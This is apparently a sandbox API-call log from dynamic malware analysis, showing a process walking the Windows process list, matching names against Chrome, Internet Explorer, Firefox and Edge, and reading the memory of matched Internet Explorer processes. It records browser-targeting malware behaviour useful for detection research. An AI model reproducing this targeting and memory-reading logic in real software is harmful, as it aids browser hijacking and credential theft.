	[0241.507] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0241.508] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x8624
	[0241.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.508] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0241.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.508] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.508] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0241.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.509] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.509] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0241.510] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x8628
	[0241.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.510] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0241.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.510] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.511] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0241.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.511] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.512] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0241.513] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x862c
	[0241.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.513] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0241.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.513] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.514] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0241.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.514] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.515] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0241.515] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x8630
	[0241.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.515] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0241.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.516] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.516] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0241.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.516] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.516] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0241.517] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x8634
	[0241.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.517] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0241.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.518] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.518] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0241.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.518] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.518] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0241.519] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x8638
	[0241.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.519] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0241.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.521] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.522] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0241.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.522] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.522] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0241.523] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x863c
	[0241.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.523] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0241.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.524] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.524] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0241.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.525] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.525] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0241.526] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x8640
	[0241.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.526] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0241.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.527] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.527] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0241.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.528] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.528] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0241.529] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x8644
	[0241.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.529] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0241.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.530] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.530] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0241.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.531] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.531] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0241.532] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x8648
	[0241.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.532] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0241.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.533] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.533] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0241.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.534] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.534] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0241.535] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x864c
	[0241.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.535] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0241.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.536] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0241.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.536] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0241.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.536] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.536] NtQueryInformationProcess (in: ProcessHandle=0x864c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0241.537] ReadProcessMemory (in: hProcess=0x864c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0241.537] ReadProcessMemory (in: hProcess=0x864c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0241.537] ReadProcessMemory (in: hProcess=0x864c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0241.537] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0241.537] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0241.538] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x8650
	[0241.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.538] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0241.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.538] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0241.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.538] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0241.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.539] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.539] NtQueryInformationProcess (in: ProcessHandle=0x8650, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0241.539] ReadProcessMemory (in: hProcess=0x8650, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0241.539] ReadProcessMemory (in: hProcess=0x8650, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0241.539] ReadProcessMemory (in: hProcess=0x8650, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0241.539] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0241.539] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0241.540] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x8654
	[0241.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.540] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0241.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.541] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.541] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0241.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.541] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.542] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0241.542] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x8658
	[0241.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.542] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0241.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.543] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.543] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0241.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.543] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.544] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.544] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x865c
	[0241.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.545] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.545] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.545] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.546] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.546] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.547] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.547] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x8660
	[0241.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.547] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.548] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.548] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.548] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.549] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.549] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x8664
	[0241.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.549] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.550] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.550] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.550] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.551] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0241.552] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x8668
	[0241.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.552] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0241.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.552] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.553] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0241.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.553] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.553] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.554] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x866c
	[0241.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.554] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.555] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.555] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.556] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.556] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.557] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x8670
	[0241.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.557] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.558] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.558] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.558] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.558] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0241.559] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x8674
	[0241.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.559] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0241.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.560] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.560] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0241.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.560] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.560] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0241.561] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x8678
	[0241.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.561] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.562] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.562] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.562] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.562] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0241.563] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x867c
	[0241.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.563] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
